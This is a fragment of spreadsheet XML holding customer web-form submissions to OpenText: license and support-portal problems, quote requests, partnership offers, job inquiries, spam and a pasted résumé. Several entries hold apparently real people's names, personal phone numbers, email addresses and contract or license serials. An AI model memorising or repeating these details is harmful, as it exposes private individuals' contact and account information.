company to me when I met him in trade fair some time ago and I have _x000D_
decided to give your company a trial. Kindly send quotation of you company product FOB. _x000D_
_x000D_
Please kindly reply ASAP _x000D_
_x000D_
Street Address, _x000D_
Alameda Santos._x000D_
211 salas 1001/1002._x000D_
Sao Paulo. Brazil._x000D_
Zip Code, SP 01418-000._x000D_
Telephone, 55 11 3171 3342_x000D_
</t>
  </si>
  <si>
    <t>CX</t>
  </si>
  <si>
    <t xml:space="preserve">December 19, 2018_x000D_
_x000D_
To Whom It May Concern:_x000D_
_x000D_
The Happily Ever After League (HEAL) would like to humbly petition opentext for consideration in funding HEAL’s everyday giving.  HEAL enriches the lives of women in cancer recovery and dependent children. The Happily Ever After League, (HEAL), is an Arizona 501c3 grassroots nonprofit organization. _x000D_
_x000D_
The mission of HEAL is focused upon improving the quality of life in our communities by providing grants to mothers in Arizona who are undergoing cancer treatment and recovery, and who have at least one dependent child. HEAL provides grants to help offset costs for needed medical diagnostic tests and procedures, medical deductibles, medical co-pays, prescribed medications as well as rent, utilities, groceries, and transportation to and from medical appointments._x000D_
_x000D_
Lauren Daniels, Founder, was 35 when she was diagnosed with breast cancer. Lauren’s youngest if three children was only one when she had a bilateral mastectomy. Lauren felt very fortunate for an early diagnosis and wanted to develop an organization that would benefit other Arizona mothers._x000D_
_x000D_
We will be happy to feature Halliburton Foundation recognition on HEAL’s website and in all social media platforms.  We are happy to provide any further documentation to better assess our worthiness of your contribution for non-profit assistance.  Please accept our sincere thanks for your consideration.  _x000D_
_x000D_
Respectfully Submitted on behalf of Lauren Daniels, Founder &amp; President of HEAL _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Endpoint forensics demo </t>
  </si>
  <si>
    <t>unable to activate license keys for EnCase renewals after receiving email from Jacquie@natix..</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to obtain a quote.  How do I do that? </t>
  </si>
  <si>
    <t>We need to renew our contract, but we would like to change the term to 3 months.  Can someone please send me a revised quote?  Thank you!</t>
  </si>
  <si>
    <t>We are a Saudi group working in different fields in developing projects in Saudi Arabia. We hope to cooperate with you</t>
  </si>
  <si>
    <t>I am interested in the Provision product and would like to explore some opportunities to trial it.  We are starting a process modeling exercise in our Customer Service organization and I have use the Provision product before at Cisco.   Can you give me guidance on licenising and deployment options.   _x000D_
_x000D_
Paul.</t>
  </si>
  <si>
    <t>Open Text Elite - I have attempted to redeem points for gifts for my team and have not received them.  Sent a follow up email with no response.  Can someone help me please?</t>
  </si>
  <si>
    <t>Looking to implement eFax for my client, Asheville Radiology Associates. We are implementing a Medinformatix RIS system and the have recommended RightFax as an eFax solution that works with their platform.</t>
  </si>
  <si>
    <t xml:space="preserve">Could you provide me with a PDF copy of the EnCase Software SAFE User Guide (formerly known as the "Guidance Software SAFE User Guide") The only links to this I can find point to Guidance which re-directs to OpenText who does not seem to have the document anywhere that I can find. </t>
  </si>
  <si>
    <t>Infomation and Pricing on your ECM and EIM</t>
  </si>
  <si>
    <t>Hello, we need a copy of our current service contract for Metaldyne please.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">A paid license user is getting an "invalid registeration code" error from Global 360. </t>
  </si>
  <si>
    <t>Could I get a listing of our products/licenses of Encase?  City of Bakersfield Police Department.  I've tried calling multiple times, but when I get transferred over to support the phones either rings to a fax machine or no one ever answers._x000D_
Buffie Kaiser_x000D_
City of Bakersfield_x000D_
661-326-3283_x000D_
bkaiser@bakersfieldcity.us</t>
  </si>
  <si>
    <t>I'm drivier i need u job</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Question, _x000D_
One my Airside drivers had accident other day I was first on scene and report my operation team who attended they informed me and driver he had 9 points on Airside drivers permit,  I attended crew room after finished with driver who had told others of his points and left to go office the other staff wet question me about points and all I said was points can transfer from Airside drivers licence to his Airside pass and today I have had a beech in GDPR I think this is rubbish but with being a operation supervisor for 8 years and have never had HR training but never had this before can advise </t>
  </si>
  <si>
    <t>would like to discuss partnership opportunities for OpenText in Sudan through our company</t>
  </si>
  <si>
    <t>I am interested in the Report Builder product if it has the ability to use .qqt files from an old install of Gupta Quest Report.  Thanks, Jon</t>
  </si>
  <si>
    <t>Captiva Renewal Quote Request for:_x000D_
We need an additional quote for the below list. We renewed it last year through a separate vendor so if you need more info to create a quote for this, please let me know._x000D_
_x000D_
Enterprise License:118414Test/Dev/DR License(s): 121451, 121452, 121453_x000D_
Captiva Standard Server with No Test/Dev/DR License: 121454 Server IDs: 118414, 121451, 121452, 121453_x000D_
Please email or call.</t>
  </si>
  <si>
    <t>VPN connection keeps timing out after eight hours. We need a way to keep that connection open or automating it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I like to know which version of Open Text Exceed software support to Windows 2016 Server to connect Mainframe session using Host Explorer option._x000D_
_x000D_
Thanks_x000D_
Manoj _x000D_
</t>
  </si>
  <si>
    <t>We have OT direct licenses with SAP America.  How do we access the Knowledge Center to download patches and notes?  Thank you,</t>
  </si>
  <si>
    <t>I received a My Support account registration email, but when I click the link to create a password, I get a password update failed message.</t>
  </si>
  <si>
    <t>Good day -- trying to access your support portal to check for updates for our TD3 imager. I tried the password reset for our email ecb2.sps@gmail.com and it fails.</t>
  </si>
  <si>
    <t>Could you please send a current W-9 to me for our records?</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern, _x000D_
_x000D_
My name is Bader OULAMINE and I represent the company ITELSYS. ITELSYS is the result of technical expertise in the field of Enterprise Content Management (ECM) for the private and public sector in Morocco;_x000D_
_x000D_
We offer innovative technological solutions to support the digital transformation of our customers._x000D_
_x000D_
Founded in 2011, ITELSYS is a service and engineering company that offers its clients Consulting, IT Integration, BPO (Business Process Outsourcing) and General Survey services;_x000D_
_x000D_
We are contacting you because we believe that what you offer is very needed in the Moroccan Market and we would like to discuss terms of a future partnership with you._x000D_
_x000D_
Best Regards </t>
  </si>
  <si>
    <t>Can you please send me the invoice for PO 4103826795 in the amount of $2,480.65?_x000D_
_x000D_
Thanks,_x000D_
Crystal</t>
  </si>
  <si>
    <t>Inquiries for job</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I'm looking for the ENCE EnCase Certified name lists._x000D_
It was in the old guidance site._x000D_
</t>
  </si>
  <si>
    <t>I am unable to properly login to the opentext account even after verifying verification email._x000D_
user id : outputmanagement@rwe.com. Please check</t>
  </si>
  <si>
    <t>I need to download the updated firmware for my newly acquired Tableau TX-1 Forensic Imager machine.  How can I get it?</t>
  </si>
  <si>
    <t xml:space="preserve">Lost all information from previous IT department. </t>
  </si>
  <si>
    <t>Hello guys,_x000D_
 _x000D_
Could you please give us a price of (QBank Enterprise) for about 25 admins and not less than 1-2 TB of storage?_x000D_
We are an advertising and event management agency with tens of enterprise clients and we need such a product._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hi! I'm interested in your software product: Documentum._x000D_
Do you have a Catalogue where do you resume all the principal information about this software? information about prices, services acces, etc. where I can read it? _x000D_
Please let me know, and If you have one, be free of send it to my by my email Address._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I write you this message regarding the application IXOS LiveLink/SAP OpenText._x000D_
I would like to know from which version of windows 2012 the application is compatible with. _x000D_
I would also like to know for windows server 2012 R2 and windows server 2016._x000D_
I hope to here from you soon. Thank you in advance!_x000D_
_x000D_
Kind regards,_x000D_
Priscilla Jainandunsing</t>
  </si>
  <si>
    <t xml:space="preserve">I am a Guidance EnCase customer and I would like to get the access to the support portal. </t>
  </si>
  <si>
    <t xml:space="preserve">Reseller Request_x000D_
Dear Ladies and Gentlemen,_x000D_
 _x000D_
we are a German value added Distributor and one of our customers is interested in:_x000D_
 _x000D_
1 x Encase Forensic_x000D_
Enduser: NATO Belgium_x000D_
_x000D_
Could you please send me a quote with reseller price, list price, shipment and payment conditions at your earliest convenience? We are able to purchase via Paypal as well, maybe with a reseller coupon code._x000D_
_x000D_
Thanks for your assistance._x000D_
_x000D_
Best regards_x000D_
 _x000D_
Sylvia Klein_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inquiry regarding Exceed 2007 licencing. We plan on distributing Exceed as a virtual application. Wondering whether deploying the software as a virtual application by user is acceptable with the license agreement? The software would "install" as the user logs in, and be removed when they log out, but they may use it across multiple machines. Also wondering about running the app in a VDI environment, again only one per user at a time, but users would be logging into a different "machine" every day. _x000D_
Thanks,_x000D_
Josh</t>
  </si>
  <si>
    <t>Hi, i need some information about certifications and trainins in eDocs DM. I Have got a customer with eDocs and i would like to certificate my company as a partner of OpenText or at least, train myself to give a better service to my customer. My Customer have licence, It is Cases &amp; Lacambra.</t>
  </si>
  <si>
    <t>Am looking for Apprenticeship</t>
  </si>
  <si>
    <t>Hi,_x000D_
My company, Asset Technology Group, is tier 1 partner to OpenText. It's based in Egypt. I have a case that we are implementing OT ECM to one of our customers (multinational) and my team would like to open Service Request. The issue is that OT has told us that we have to link one of my team members account to the customer account (who purchased the OT licenses directly from OT and has already a support contract) in order to be able to open the service request. Now, this option is not acceptable to our customer who insists that we open the service request with our own account which has no privileges to open service requests. Now, we need to know, since our company is tier 1 partner to OpenText, do we have the right to open Service Request or not. And if not, what are the alternatives to fix this issue without the need to link our account with the customer's account. your help and prompt response are highly appreciated.</t>
  </si>
  <si>
    <t>how to buy TeamDeveloper license ?</t>
  </si>
  <si>
    <t>Hi, we are using BravaViewer in a solution developed together with the company CADAC. We observe that viewing big vector-pdfs in Bravaviewer is fast if ActiveX is enabled. In HTML mode of Bravaviewer, Performance is very bad for this type of pdf. Also, compare functionality is better in ActiveX mode. _x000D_
Since ActiveX is not "state of the art" anymore, I would like to ask whether there is a development ongoing that will bring the same Performance and Features into a solution that is independant of ActiveX._x000D_
Curious for your Feedback!</t>
  </si>
  <si>
    <t xml:space="preserve">Good day! May I ask if OpenText company is accepting Work Immersion Trainees. It is a requirement for Senior High School.Thank you for time. </t>
  </si>
  <si>
    <t>I Need Trial Downloads and correspondent PMS for various Versions of SQLBase (Versions 11.7 and 12.1) and Team Developer (Versions 6.3 and 7.1).</t>
  </si>
  <si>
    <t>nothing</t>
  </si>
  <si>
    <t>i am very interested for programming java language</t>
  </si>
  <si>
    <t>Hi Team, I would like to get a demonstration of the Application Open Text in my Organization, to check whether we can implement the same_x000D_
Regards_x000D_
Vineeth Kalarikkal</t>
  </si>
  <si>
    <t>Usif</t>
  </si>
  <si>
    <t>ST</t>
  </si>
  <si>
    <t>Visit to the OpenText office, Waterloo Canada_x000D_
_x000D_
A short introduction:_x000D_
I'm Peter van der Wijden, lecturer at University of Applied Sciences Leiden, department Informatica. As part of my job I'm also a member of the HBO-foundation on ICT (HBO-I). Every two years HBO-I organizes an international study-tour, this time I'm a member of the tour-committee._x000D_
Our tour will take place from March 16 till March 24, 2019._x000D_
_x000D_
Every two years the Dutch association of IT bachelor programs at the Universities of Applied Sciences in the Netherlands (HBO-i Foundation) organizes an international study tour. Approximately 40-50 deans, programme directors, professors and lecturers visit foreign universities and companies to learn about IT education, IT industry and IT developments in the countries we visit._x000D_
_x000D_
In the past we visited the USA (Silicon Valley), Japan (Tokyo), China (Beijing), India (Bangalore), USA (New York and Boston), South Africa (Johannesburg and Cape Town), Singapore and Malaysia (Kuala Lumpur). In 2019 we will visit Canada, and more specific the Toronto/Ontario area._x000D_
_x000D_
_x000D_
On behalf of the HBO-I Foundation I ask you for your kind cooperation to facilitate some time as host-organization in the program of our study-tour. Is it possible to visit your institute during the mentioned period?_x000D_
_x000D_
The purpose of the study tour is to develop the knowledge and competence of the participants for the benefit of the it-studyprograms in the Netherlands. The study-tour-participants will acquire strategic knowledge regarding the international developments on:_x000D_
_x000D_
    the it-applications (in organisations, in community)_x000D_
    the it-domain (research organisations)_x000D_
    the it-education (educational organisations)_x000D_
    the it-profession (organisations)_x000D_
    the it-market (it-companies)_x000D_
    the aspects of it in relation to the international economic and cultural developments_x000D_
_x000D_
_x000D_
For the 2019  study tour we like to focus on strategic developments and on it-application-development in a(n</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,would like to get in touch to know if you guys can help us with few API integration part and other requirements.Please do call for better understanding. </t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
Ich habe ein Problem mit der Installation von OpenText Imaging Enterprise Scan 16.4.0. Ich stecke beim 4.ten Punkt fest (Prerequisites). Ich habe alle Microsoft C++ versionen installiert aber es  findet Microsoft Visual C++ 2008 Redistributable (x86) und Microsoft Visual C++ 2010 Redistributable (x86) nicht. Ich habe diese auch mehrmals neu installiert aber Sie werden immer noch nicht gefunden.</t>
  </si>
  <si>
    <t>Ufis</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Kindly we are an Information &amp; Education Services company looking for long term partnership, we have a customer want to get an ECM platform, so how we can cooperate to provide them your solution._x000D_
_x000D_
Sincerely.</t>
  </si>
  <si>
    <t>Udueifi</t>
  </si>
  <si>
    <t>Technical Support - My team uses the xlib.h header file that is/was packaged with Exceed XDK. I am unable to find that header file in the Exceed XDK that comes packaged with Exceed Suite 15. Is that header file no longer provided?</t>
  </si>
  <si>
    <t>Request for Information. Please connect me to your Saudi Arabia/GCC/Middle East Office._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Need a price Quotation for our end customer who is interested in your product</t>
  </si>
  <si>
    <t>Need to know about the rightfax cloud and its pricing.</t>
  </si>
  <si>
    <t>Once I run "netsh winsock reset", opentext can never worked again, unless I re-install it._x000D_
Beside, when I run opentext, my network goes badly, but my teammate who is using opentext don't have this trouble. I would like to know which network setting I should pay attention please?</t>
  </si>
  <si>
    <t>we are not receiving any updates or responds to our annual renewal contract updates from our partner square one technologies india. this has become a major issue for us to respond to our two customers in srilanka. kindly send us an update asap.</t>
  </si>
  <si>
    <t>Currently is there any plans to integrate Open text to SuccessFactors LMS. If there is no Plans in future, Do you have any workaround solution to integrate?</t>
  </si>
  <si>
    <t>Hello - I saw the recent announcement that EnFuse will be in Fall of 2019. I was kind of banking on the EnFuse conference to renew my EnCE certification which expires on September 2, 2019. Since the conference will be later in the year than it typically would be, will OpenText be willing to allow a short grace period for my certification renewal?</t>
  </si>
  <si>
    <t>BJ</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm Sean and I'm located in Los Angeles. I specialize in marketing local and long distance moving companies all over the US._x000D_
_x000D_
I can assit you to generate more leads via the local maps and organic search results._x000D_
_x000D_
If you have 1 location or multiple locations - I can help you appear on the first page of the search engines._x000D_
_x000D_
Let me know the location and the services that you would like to rank for so you can get business even in the low season._x000D_
_x000D_
Talk soon,_x000D_
Sean_x000D_
</t>
  </si>
  <si>
    <t>I was wondering if you can recommend a suitable solution for Fax. We are located in Guam and interested in HIPAA Compliant Fax and would like to integrate Opentext Rightfax to our RIS. We are sending around 50 reports per a day to our customer, Referring Physician and patient. Please advise._x000D_
_x000D_
Thanks in advance,_x000D_
JK</t>
  </si>
  <si>
    <t xml:space="preserve">We are considering converting our current fax server to rightfax and need to get pricing ASAP.  We are currently implementing Epic 2018 along with cloud based OnBase.  We are looking for the RightFax FCL integration method.  Please give me a call at your earliest convenience as we are against some very tight timelines.  </t>
  </si>
  <si>
    <t>did not receive october invoice</t>
  </si>
  <si>
    <t xml:space="preserve">Working with a client on a compliance review and approval workflow. We are interested in learning more about your Financial Services products and solutions. </t>
  </si>
  <si>
    <t>Jfjfjfb</t>
  </si>
  <si>
    <t>I would like to purchase a license for Capture Center for development purposes.</t>
  </si>
  <si>
    <t>Hello, we have 3 alchemy databases which we need the data extracted off. Is alchemy something that you still support and can assist with?</t>
  </si>
  <si>
    <t>Lindiwe. Mgabhi.  0727241646</t>
  </si>
  <si>
    <t>Lindiwe  mgabhi   0727241646</t>
  </si>
  <si>
    <t xml:space="preserve">We have not accessed this account in over a year and email account says its no longer valid._x000D_
contract id is 1-3428018038, another ref is 165150689.  How to we gain access ?"_x000D_
thanks_x000D_
myles schwartz_x000D_
</t>
  </si>
  <si>
    <t>One of our faculty will be conducting a research project this spring with students who will be collecting data on paper forms.  One of her colleagues at another institution recommended TeleForm as a solution to help get the data into her research database._x000D_
_x000D_
I would like more information on resellers and/or pricing for the TeleForm product.</t>
  </si>
  <si>
    <t>Orphans HIV /AIDS to the children the need the office weeks the need the children the schools inform the food the skills and the chalet to help the children the</t>
  </si>
  <si>
    <t>I you help to the children the need the children</t>
  </si>
  <si>
    <t>I am unable to download the Tableau firmware update package from your website as both Chrome reports incorrect certificates. Can you fix this error as these are critical updates contained in the firmware update tool.</t>
  </si>
  <si>
    <t>I would appreciate details and a quote for the academic program. I expect 10 to 15 students.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'm evaluating a number of packages for workflow and document management, and I would like to know if it would be possible for me to run a trial version of documentum. I also have a few questions so it would be great if someone contacted me._x000D_
Regards, Frederick_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">0508261455_x000D_
</t>
  </si>
  <si>
    <t>Hi, I'm interested to schedule a demo in January and get a budgetary quote before end of the year.</t>
  </si>
  <si>
    <t>I am not able to log in into Catalogue.  User CS912A</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
This is Gil Barron from TS-electronics company, we are resellers, we have a customer in Mexico asking for OpenText EnCase eDiscovery license, Our customer is Mexican goverment, there is a problem if we resale it to our customer?  this would be just one time purchase, if not a problem can you quote me those licenses please?_x000D_
_x000D_
Will appreciate your fast response!</t>
  </si>
  <si>
    <t>I am looking for assistance with a couple of things in RightFax. I have recently done a large phonebook import into RightFax. What is the best way to share/have this phonebook import view able by all users in RightFax? Also, we have the RightFax searchable PDF module. Is there a way to generate searchable PDF documents from the RightFax FaxUtil? It seems I can only get searchable PDF documents when the system emails the users.</t>
  </si>
  <si>
    <t xml:space="preserve">I just joined corporate Trinity Health as a contractor and I am trying to get access to my support. Do I need to contact my administrator or is this something OpenText can assist me with? I received the page saying I need to confirm my email to receive access and I receive an email and press the confirm registration which leads me back to login screen at OpenText. It says my email has been validated but I asks for me to login. When I do and navigate to MySupport I get the same initial text that I need to verify my account. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to see if my name is on the list </t>
  </si>
  <si>
    <t>Good afternoon.  I've been trying to apply for the position of Director, Human Resources Corporate Development on your website and it's not letting me.  Please find below my resume, which I have copied and pasted, could you please forward to the appropriate person.  Thank you!_x000D_
Laurie A. Field_x000D_
289-442-6286_x000D_
lafieldjc@outlook.com _x000D_
_x000D_
PROFESSIONAL PROFILE _x000D_
_x000D_
Multi-disciplined Human Resources Manager with over 15 years of national and international experience.  An intelligent risk taker and influential leader that places high priority on accountability and embraces the values of honesty, integrity and initiative.  Proven ability to build a strong human resources department by providing sound advice, coaching and recommendations.  _x000D_
_x000D_
BUSINESS EXPERIENCE _x000D_
_x000D_
July 2013 – June 2018  Strategic Recruiting Inc. – Toronto, ON_x000D_
President_x000D_
_x000D_
•	Designing and implementing the overall recruiting strategy for the client;_x000D_
•	Sourcing and attracting candidates by using databases, social media etc.;_x000D_
•	Conducting interviews and filtering candidates for open positions;_x000D_
•	Develop and update job descriptions and job specifications for the client;_x000D_
•	Screen candidates resumes and job applications;_x000D_
•	Conduct interviews using various reliable recruiting and selection tools/methods;_x000D_
•	Assess applicants’ relevant knowledge, skills, soft skills, experience and aptitudes;_x000D_
•	Monitor and apply HR recruiting best practices;_x000D_
•	Act as a point of contact and build influential candidate relationships during the selection process;_x000D_
•	Maintain candidate database;_x000D_
•	Involved in candidate sourcing: review resumes and credentials for appropriateness of skills, experience and knowledge in relation to position requirements;_x000D_
•	Work within ATS to screen resumes for dissemination to departments._x000D_
_x000D_
_x000D_
January 2013 – June 2013  Agnico-Eagle– Nunavut, Canada_x000D_
Human Resources Superintendent_x000D_
_x000D_
•	Work with Corporate office to ensure HR policies and procedures are implemented;_x000D_
•	Work closely with department</t>
  </si>
  <si>
    <t>We are attempting to renew our SMS contract (ID G2002077843) but are not sure where to find an invoice/quote/etc. We do not see any related emails. Could someone please forward this to adean@greycastlesecurity.com?</t>
  </si>
  <si>
    <t xml:space="preserve">Quotation to implement OpenText Documentum for Quality and Manufacturing for a Mexican Pharmaceutical company for the automation and management of the Documentation System of the company. I require the cost for the implementation, validation and user licenses as well as a presentation of the system and the comparison against other systems in the market, such as TrackWise._x000D_
_x000D_
Thank you, my e-mail is laranda@silanes.com.mx </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
could anyone help us to download an enCase Forensics software we have licensed?_x000D_
_x000D_
An account has been registered, and when accesing the download or activation FAQ resources an email confirmation is requested. The mail address is confirmed but the access is not granted._x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">I am responsible for doing research into document management solutions for our legal department and would like to know if there is someone that I could speak with about eDocs? If you could please put me in touch with the correct person to get some info I would greatly appreciate it. </t>
  </si>
  <si>
    <t>Dears, _x000D_
we have serious issues with your license management in London. It is four years we do not agree with the way to count licenses, without formal answer, and because your sap based log in count does not match with the reality. We are in charge of air navigation for all Switzerland and additional territories, and an HRO organization with extremely high level of safety requirements. Web based community to address questions is not acceptable, and certainly not a way to deal with customers. I would be extremely grateful that your sales management (neither the swiss one, nor the UK one, one has been phased out by your own organization, and the second has at least one person showing not acceptable behavior) connects with me at the +41791029592. We cannot accept disrespect to our people, nor that our business model is not respected. Looking forward to read from you. best regards. Thierry Jaccon</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to download the latest version of Encase. I believe we are current on our support. Can you please assist? </t>
  </si>
  <si>
    <t xml:space="preserve">We are working toward getting a new environment set up for 16.2 and would like to run our architecture plans by someone to make sure we have those ready for our network engineers to take and start setting up. We're hoping to have this done by the end of the week. Please let me know if that is feasible and what the cost would be. </t>
  </si>
  <si>
    <t xml:space="preserve">Account check. My company receives several invoices from Opentext and I need a clear picture of what each one is for and the location the service is provided. </t>
  </si>
  <si>
    <t>Dear sir Dec 21 i want go to contaré so i will come back Feb 9 so my Pakistán contact number 0092-3323337734</t>
  </si>
  <si>
    <t>Hello, I am an OpenText SC and need to recommend to a customer certain training classes.  This is a long-time LiveLink customer that recently upgraded from 10.5 to 16.2.5.  They need to take training around What is New and very importantly the Smart UI.  Can you please tell me which classes from our catalogue should I recommend knowing they already know Content Server?  Thanks</t>
  </si>
  <si>
    <t>I have received 2 confirmation emails but I'm still not able to access to our licenes tabs in the support portal.</t>
  </si>
  <si>
    <t>Need robux</t>
  </si>
  <si>
    <t>Want to download Opentext desktop viewer</t>
  </si>
  <si>
    <t>Looking to take the introductory Business Consultant training for OpenText Content Management and Records Management. Please advise which is the best certification courses to start with. Do you have learning paths for this stream of products?_x000D_
_x000D_
Best,_x000D_
Sophie</t>
  </si>
  <si>
    <t>Applying for job in Kansas City</t>
  </si>
  <si>
    <t>Sind SAP Extend. ECM for Government by OpenText Lizenzen auf SAP Ext. Ent. Content Mgmt by Open Text anrechenbar?</t>
  </si>
  <si>
    <t>Hej, Jag önskar få prisuppgift på Exceed och Exceed3D dels för en enanvändarlicens och dels för en tvåanvändarlicens. Denna uppgift behövs innan vi kan ta beslut om vi ska testa en provlicens eller inte._x000D_
Hälsningar_x000D_
Lars Berglund</t>
  </si>
  <si>
    <t>Hello,_x000D_
This is the 3rd email we wrote and we still do not have help._x000D_
_x000D_
Years ago we bought an Encase Forensic product. We have the key device, but we lost the installer of the software._x000D_
_x000D_
We need get some files from a hard disk (unlocked cluster) and we need to have the Encase Forensic working, but as say you we don´t have the installer._x000D_
_x000D_
At this moment, I have the key for Encase Forensic, but i don´t have the software, then Can you send me a link for download it, please?_x000D_
_x000D_
My key device has this serial number: G2002047153_x000D_
_x000D_
Thanks for your response._x000D_
_x000D_
Probably our mail server filtered your previous answers.</t>
  </si>
  <si>
    <t>We are looking for an EDI solution. Read good reviews about 'opentext'. Can you contact me to take the conversation forward.</t>
  </si>
  <si>
    <t>I cannot reset my password for Opentext Connect. I have requested a link to reset my password, but attempting to do so, is ending with errors, regardless which password I try to set. This is although the choosen password(s) are shown as "strong". _x000D_
The root cause of the failure is not clear. I need some help to set my password. _x000D_
_x000D_
Best Regards_x000D_
Alois Lobmeier</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please provide some information about the correct deinstallation procedure for Opentext Tempo on Mac?_x000D_
_x000D_
Problem: We deinstalled OpenText Tempo with AppCleaner but after opening programs like Microsoft Word, a window "opentext tempo box.dmg" opens and we are asked for a License Agreement._x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Best regards_x000D_
Dennis Kirchhoff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen,_x000D_
I'm working for a Software Company which develops products for the pharmaceutical industry (www scinteco com). One of our customer uses an on-site installation of Documentum which our product should utilize for data storage. _x000D_
Do you have any kind of partner program, that would allow us to run Documentum in our environment for developing and testing purposes? Since we only need to implement basic file operations, the simplest edition (that includes an API) would be sufficient for our needs._x000D_
_x000D_
Best regards_x000D_
Lukas Gansinger_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>[PRIVATE &amp; CONFIDENTIAL] Employment Verification - eeVoices, Hong Kong _x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
This is Anson from eeVoices, Hong Kong._x000D_
_x000D_
We have been authorized by a former employee to request that you verify the employment with OpenText (Singapore). Kindly let us know which person in the Human Resources Department that we can contact in order to complete this employment verification._x000D_
_x000D_
Please do not hesitate to contact me if I can assist you in any possible ways. Thank you in advance for your response. Your earliest response will be appreciated!_x000D_
_x000D_
_x000D_
-- _x000D_
Best regards,_x000D_
_x000D_
Anson Fung _x000D_
Client Relations_x000D_
eeVoices Limited_x000D_
(852) 2262 2727 - office_x000D_
(852) 2262 2672 - fax_x000D_
_x000D_
"Helping organizations take the risk out of people decisions" is our vision and, at its most basic, it is what we do for our customers - it is our mission._x000D_
_x000D_
**********************************************************************************************************_x000D_
Disclaimer: The information contained in this email is strictly confidential and intended solely for the use of the designated addressee(s). Any unauthorised viewing, disclosure, copying or distribution of this message or attachments is prohibited. If you have received this e-mail in error, please do not read it, reply to the sender immediately to inform us that you are not the intended recipient, and delete the e-mail from your computer system. This email and any attachments are believed to be free of virus or other defects that might affect another computer system, however, recipients are responsible for ensuring that the contents are virus free as eeVoices Limited will not accept responsibility for any loss or damage arising from this email or its use. Thank you.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I am doing research on the impact of ECM in small businesses._x000D_
Can you tell me a number of companies that use (extended) ECM in the Netherlands?_x000D_
I would like to hear from you._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Willemy Maasland</t>
  </si>
  <si>
    <t>IMPORTANT PRESS RELEASE. I Seek everyone’s support to make our world fraud and cybercrime free to restore honesty._x000D_
_x000D_
Dear Sir/Madam_x000D_
_x000D_
Following reports show government is failing to please the public rich and poor despite of increasing borrowing more money (not necessary if losses due to fraud are saved), increasing taxes ( this offends rich),   freezing wages, cutting jobs (this offends the poor) and struggling to fund police, NHS, firefighters, social services, medical staff, teachers , homeless etc. (this offends the entire society)._x000D_
_x000D_
Globally governments are and have ignored to stop thieves (fraudsters and cyber criminals from stealing fortunes by fooling us and despite of knowing that these problems will continue to get worse and yet banks, government and police are ignoring idea of personalising signature, PIN and passwords to the individuals to stop criminals from misusing our most important personal details._x000D_
_x000D_
1.	Fraud costs UK economy £193 billion a year – equating to more than £6,000 lost per second every day. (Government, banks and police have been aware of this massive stop able problem for years but failed to stop it.)_x000D_
_x000D_
2.	Identity theft has reached epidemic levels in the UK, with incidents of this type of fraud running at almost 500 a day, according to the latest figures. (Doing nothing to stop these criminals is only going to make the problems many times worse.)_x000D_
_x000D_
This year alone saw more than 600 data breaches shows that any one of us could become victim of identity fraud, card fraud and cybercrime unless proposed systems are implemented by banks to personalise our signatures, pin and passwords to the individuals to stop these crimes forever._x000D_
_x000D_
Using money power master criminals make poor and youths to do their dirty work like selling drugs, do human trafficking etc.. like slaves. This explains why lawlessness and crimes keeps on growing fast in countries where fraud crimes are growing fast. _x000D_
_x000D_
Following report warns governments to stop cri</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We did check your website and it is not on the first page of Google._x000D_
_x000D_
We are hereby offering our services to get you on the first page of Google so you can get more inquiries, leads, and sales from your website._x000D_
_x000D_
Please email us back for the full proposal._x000D_
_x000D_
Best Regards_x000D_
_x000D_
angelina</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I have completed the DF120 -­ FOUNDATIONS IN DIGITAL FORENSICS WITH ENCASE course last year when I was employed with Epiq Global and cannot find the certificate for it anymore, would it be possible for you to send it to me again?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Max Fuchs </t>
  </si>
  <si>
    <t>Hello, _x000D_
we are contacting you since we have heard that there is a new vezrsion of ProVision available._x000D_
Could you please provide us with the sources where we can download and install it?_x000D_
Thanks in advance,_x000D_
Magda</t>
  </si>
  <si>
    <t>Need to know the features of the tool and what are the file types it can redact?</t>
  </si>
  <si>
    <t>Request for access support area for VIM._x000D_
Until two weeks ago I used old account of my previous IT Manager, but now it seems it was deleted.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a Right Fax server for our Busselton Health Campus and for some reason notifications have stopped working when the mental health department send / receive faxes._x000D_
_x000D_
Just wondering if I can chat to someone about what things to look for as I have not had much involvement with this system._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HOW CAN I DOWNLOAD ENCASE V8.08, I CAN'T FİND ENCASE V8.08 İN ENCASE PAGE</t>
  </si>
  <si>
    <t>9703 NE Juanita Dr, Kirkland, WA 98034</t>
  </si>
  <si>
    <t>yes</t>
  </si>
  <si>
    <t>1215 S Baldwin Ave Arcadia CA91007</t>
  </si>
  <si>
